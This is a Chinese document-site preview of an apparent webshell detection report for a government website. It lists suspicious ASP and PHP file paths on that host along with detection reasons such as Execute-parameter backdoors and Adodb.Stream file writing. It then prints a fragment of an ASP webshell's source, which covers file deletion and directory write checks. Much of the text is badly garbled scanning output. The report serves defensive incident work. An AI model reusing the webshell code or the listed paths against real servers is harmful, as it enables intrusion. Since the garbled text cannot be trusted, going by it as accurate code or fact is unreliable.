返回
木马(WEBSHELL)检测报告

木马(WEBSHELL)检测报告

ID:44541709

大小:257.02 KB

页数:7页

时间:2019-10-23

木马(WEBSHELL)检测报告_第1页
木马(WEBSHELL)检测报告_第2页
木马(WEBSHELL)检测报告_第3页
木马(WEBSHELL)检测报告_第4页
木马(WEBSHELL)检测报告_第5页
资源描述:

《木马(WEBSHELL)检测报告》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库

1、木马(WEBSHELL)检测报告以下截图是:木马(WEBSHELL)的位置、木马(WEBSHELL)和疑似木马(WEBSHELL)的说明.文件的大小、修改时间、验证值l*C24tri»•3U»sniWl.tisW»ini»rlC■血•"»♦w»tt«•«4r«nI.A^kM>・4八,ni<>B•«*V*«cuam»mt&»•<•<*ttr<1*>fl2y・d>C«KMM^・*2«»oQ・<^・・«4«J«M*Ia*-A4«^rjl!才SB.XSW*笑asmMBUMH杠・-.0初

2、比山・・—•im.•^«r*ur)iK^>4«t«Zl«««Ml>JB«W1T«IB*I*sw(Vftt«*r»4«-)ntll±A坟佯cgCs—•■十・,t«>rtii«-.->

3、t・IM»ag•■宣T](1WWMW―g•■久c&j(>21t222*224Csimn90MC3HE-2Tam-c&-nWlf-0^-21mio-oonS1XA-193XM&-Z3aOX»-23il23VI)4112l・51005i««9l1001ItMCCXJ1F1User-Agent利用2大型脚本2大型脚本2大型脚本5多功能大马1关键字:phpinfo()1服务器状况检测1服务

4、器状况检测1User-Agent利用szb.dl.gov.cn'inc.aspszb.dl.gov.cn#d.b$#zf11.%v1.asaszb.dl.gov.cn#d.b$#zf11,%v1_fixed.asaszb.dl.gov.cn#d.b$复件#zf11.%v1.asaszb.dl.gov.cncert80sec.aspszb.dl.gov.cncerttest.phpszb.dl.gov.cn'CommonAdministratorAdmin_check.aspszb.dl.gov.cnCommonAdministrator

5、zf11_check.aspszb.dl.gov.cnlncludeConn_Head.asp4(内藏)Execute{参数:request(..szb.dl.gov.cnotherzf11_Md5.asp5Encode加密

6、exec执行

7、列目录

8、?・szb.dl.gov.cnVotezzxx.asp1服务器状况检测szb.dl.gov.cnimagesCommonAdministratorAdmin_check.asp1Adodb.Stream生成后门:[]szb.dl.gov.cnimagesCommonAdministrator

9、createjs.asp1服务器状况检测szb.dl.gov.cnimagesCommonAdministratorzf11_check.asp1Adodb.Stream生成后门:[]szb.dl.gov.cnimagesCommonAdministratorgg1createjs.asp80SEC.ASP木马(WEBSHELL)源代码:'内部测试版-mmname「虛拟主机提权专用Webshell±后门版.'shell标題mmshell」虑叔丰机根权召用Webshell80sec岀品八shell版权errout「傻诵与狗勿瘠解本人密码八竜岀错谋提

10、不serversoft-Request・ServerVariab1es(*server.softrare*)•response,write**^vbCrLf****vbCrLf*MMResponse・Buffer・TrueServer.ScriptTimeOut-999999999CONST.FSO-*Scripl"ing.FilHSysI*&*emObjecI"'把路径加入functionGetFullPuth(puth)GrtFullPnth-pathifRight(path,1)<>thenGetFullPath=path***r如果字符協后不是的就

11、加上endfunction'删除文件FunctionDe1textfi1e(fi1epath)OnErrorResumeNextSetobjFSO=CreateObject(CONSTFSO)ifobjFSO.FilcExists(filepath)then'检査文件是否存在objFSO.DeleteFile(filepath)endifSetobjFSO=nothingDeltextfile-Err.Number'返回错误码EndFunction'檢测日录定否可歸0为可读耳1为可写不可以删除FunctionCheckDirlsOKWrite(DirStr)O

12、nErrorResumeNextSet

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。